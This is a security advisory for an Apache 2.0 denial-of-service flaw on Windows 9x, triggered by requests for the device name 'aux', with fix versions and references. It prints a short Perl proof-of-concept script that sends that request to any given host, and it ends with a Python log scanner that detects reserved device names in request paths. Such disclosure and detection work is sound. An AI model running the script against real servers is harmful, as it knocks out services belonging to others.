Apache Web Server Device Name Remote Denial of Service Vulnerability

Published: 2003-01-22
Updated: 2003-01-22
Severity: Medium
Threat type: Remote denial of service
Error type: Exceptional condition handling error
Exploit method: Server mode
BUGTRAQ ID: 6662
CVE(CAN) ID: CAN-2003-0016

Affected systems

Apache Software Foundation Apache 2.0.36

Detailed description

The Apache web server is a popular HTTP server that runs on UNIX and Windows operating systems.

On Windows 9x, the Apache web server performs faulty error checking in ap_directory_walk: a request for the reserved device name "aux" can cause a denial of service against the server.

Test code

--- Apache2-nuke.pl ---
#!/usr/bin/perl
# Sends a single request for the reserved device name "aux" to the target host.
use IO::Socket;
if (@ARGV < 1 || @ARGV > 2) { print STDOUT "Usage: perl $0 <host> <port=80>\n"; exit; }
if (@ARGV == 2) { $port = $ARGV[1]; } else { $port = 80; }
# Connect to the target; abort with the OS error if the connection fails.
$f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$ARGV[0], PeerPort=>$port)
    or die "Connection to $ARGV[0]:$port failed: $@\n";
print $f "GET /aux HTTP/1.0\r\n\r\n";
close($f);
--- Apache2-nuke.pl ---

Solution

Upgrade the software:

Apache Software Foundation Apache 2.0.36: upgrade to Apache httpd 2.0.44 (http://www.apache.org/dist/httpd/)
Apache Software Foundation Apache 2.0.37: upgrade to Apache httpd 2.0.44 (http://www.apache.org/dist/httpd/)
Apache Software Foundation Apache 2.0.38: upgrade to Apache httpd 2.0.44 (http://www.apache.org/dist/httpd/)
Apache Software Foundation Apache 2.0.39: upgrade to Apache httpd 2.0.44 (http://www.apache.org/dist/httpd/)
Apache Software Foundation Apache 2.0.40: upgrade to Apache httpd 2.0.44 (http://www.apache.org/dist/httpd/)
Apache Software Foundation Apache 2.0.41: upgrade to Apache httpd 2.0.44 (http://www.apache.org/dist/httpd/)
Apache Software Foundation Apache 2.0.42: upgrade to Apache httpd 2.0.44 (http://www.apache.org/dist/httpd/)
Apache Software Foundation Apache 2.0.43: upgrade to Apache httpd 2.0.44 (http://www.apache.org/dist/httpd/)

Related information

References:
http://www.apache.org/dist/httpd/Announcement2.html
http://www.apache.org/dist/httpd/CHANGES_2.0
http://lists.netsys.com/pipermail/full-disclosure/2003-January/003653.html
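As an added detection example that is not part of this advisory, the following Python script scans access-log lines in Apache's common log format for request paths that contain a Windows reserved device name. It generalizes beyond the "aux" name given in the description to the full set of MS-DOS device names (CON, PRN, AUX, NUL, COM1-COM9, LPT1-LPT9), including names carrying an extension or URL-encoding. The log lines and client addresses are constructed sample data.

```python
import re
from urllib.parse import unquote

# Reserved MS-DOS device names on Windows; a path component whose base name equals
# one of these (case-insensitively, with any extension) names the device, not a file.
RESERVED_DEVICE_NAMES = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)

# Common Log Format: client ident user [time] "METHOD TARGET PROTO" status bytes
LOG_LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\S+) \S+'
)


def reserved_name_in_path(raw_target):
    """Return the first path component that resolves to a reserved device name, else None."""
    path = unquote(raw_target.split("?", 1)[0])  # drop query string, decode %xx escapes
    for component in path.split("/"):
        # Windows keys on the base name before the first dot and ignores trailing dots/spaces.
        base = component.split(".", 1)[0].rstrip(" .").upper()
        if base in RESERVED_DEVICE_NAMES:
            return component
    return None


def scan_access_log(lines):
    """Return (client, target, component) for each request whose path hits a device name."""
    hits = []
    for line in lines:
        m = LOG_LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        component = reserved_name_in_path(m.group("target"))
        if component is not None:
            hits.append((m.group("client"), m.group("target"), component))
    return hits


# Constructed sample log lines (not from a real server); lines 1 and 3 should be flagged.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jan/2003:10:00:01 +0000] "GET /aux HTTP/1.0" 200 0',
    '192.0.2.11 - - [22/Jan/2003:10:00:02 +0000] "GET /index.html HTTP/1.0" 200 1234',
    '192.0.2.12 - - [22/Jan/2003:10:00:03 +0000] "GET /images/%43%4f%4e.gif HTTP/1.1" 404 210',
    '192.0.2.13 - - [22/Jan/2003:10:00:04 +0000] "GET /auxiliary/lpt10 HTTP/1.1" 200 55',
]

if __name__ == "__main__":
    for client, target, component in scan_access_log(SAMPLE_LOG):
        print(f"{client} requested {target!r}: reserved device name {component!r}")
```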